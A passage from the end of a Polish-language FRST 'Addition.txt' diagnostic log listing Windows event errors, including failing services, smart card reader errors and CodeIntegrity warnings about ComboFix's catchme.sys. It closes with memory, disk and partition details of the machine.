AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/29/2017 10:09:10 AM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: ) Description: Service cannot be started. Nieprawidłowe dojście Error: (05/24/2017 10:11:52 AM) (Source: TrueKey) (EventID: 0) (User: ) Description: Failed to process session change. System.ArgumentException: Data Source cannot be empty. Use :memory: to open an in-memory database at System.Data.SQLite.SQLiteConnection.Open() at McAfee.YAP.Service.Data.McBioSQLite.GetConnection() at McAfee.YAP.Service.Data.McBioSQLite.StoreInServiceInfo(String key, String value) at McAfee.YAP.Service.Common.McBioBCAService.DisableSpoofingMode() at McAfee.YAP.Service.Service.OnSessionChange(SessionChangeDescription changeDescription) at System.ServiceProcess.ServiceBase.DeferredSessionChange(Int32 eventType, Int32 sessionId) Error: (05/24/2017 10:11:47 AM) (Source: WinMgmt) (EventID: 10) (User: ) Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected. Error: (05/24/2017 10:11:16 AM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: ) Description: Service cannot be started. Nieprawidłowe dojście Error: (05/22/2017 07:37:14 PM) (Source: TrueKey) (EventID: 0) (User: ) Description: Failed to process session change. System.ArgumentException: Data Source cannot be empty. Use :memory: to open an in-memory database at System.Data.SQLite.SQLiteConnection.Open() at McAfee.YAP.Service.Data.McBioSQLite.GetConnection() at McAfee.YAP.Service.Data.McBioSQLite.StoreInServiceInfo(String key, String value) at McAfee.YAP.Service.Common.McBioBCAService.DisableSpoofingMode() at McAfee.YAP.Service.Service.OnSessionChange(SessionChangeDescription changeDescription) at System.ServiceProcess.ServiceBase.DeferredSessionChange(Int32 eventType, Int32 sessionId) Dziennik System: ============= Error: (05/30/2017 08:17:52 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: Nie można uruchomić usługi Usługa Google Update (gupdate) z powodu następującego błędu: Nie można odnaleźć określonego pliku. Error: (05/30/2017 08:15:14 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa Intel(R) Biometric and Context Agent Service zawiesiła się podczas uruchamiania. Error: (05/30/2017 08:14:44 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:43 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:43 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 Error: (05/30/2017 08:14:42 AM) (Source: SCardSvr) (EventID: 610) (User: ) Description: Czytnik kart inteligentnych „SCM Microsystems Inc. SCR33x USB Smart Card Reader 0” odrzucił żądanie IOCTL GET_ATTRIBUTE: Żądanie nie jest obsługiwane.. Jeśli ten błąd będzie się powtarzać, może to oznaczać, że karta inteligentna lub czytnik nie działa poprawnie. Nagłówek polecenia: 07 a0 07 00 CodeIntegrity: =================================== Date: 2017-05-20 15:36:12.431 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-20 15:36:12.384 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-20 15:36:12.338 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-20 15:36:12.291 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-12 09:46:10.626 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-12 09:46:10.579 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-12 09:46:10.530 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-12 09:46:10.483 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-04-17 19:05:47.063 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-04-17 19:05:47.016 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume3\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i5-4590 CPU @ 3.30GHz Procent pamięci w użyciu: 39% Całkowita pamięć fizyczna: 4014.54 MB Dostępna pamięć fizyczna: 2435.25 MB Całkowita pamięć wirtualna: 8027.27 MB Dostępna pamięć wirtualna: 6000.07 MB ==================== Dyski ================================ Drive c: (OS) (Fixed) (Total:453.99 GB) (Free:332.61 GB) NTFS Drive y: (RECOVERY) (Fixed) (Total:11.73 GB) (Free:2.65 GB) NTFS ==>[system z komponentami startowymi (pozyskano odczytując dysk)] ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 561EAE20) Partition 1: (Not Active) - (Size=39 MB) - (Type=DE) Partition 2: (Active) - (Size=11.7 GB) - (Type=27) Partition 3: (Not Active) - (Size=454 GB) - (Type=07 NTFS) ==================== Koniec Addition.txt ============================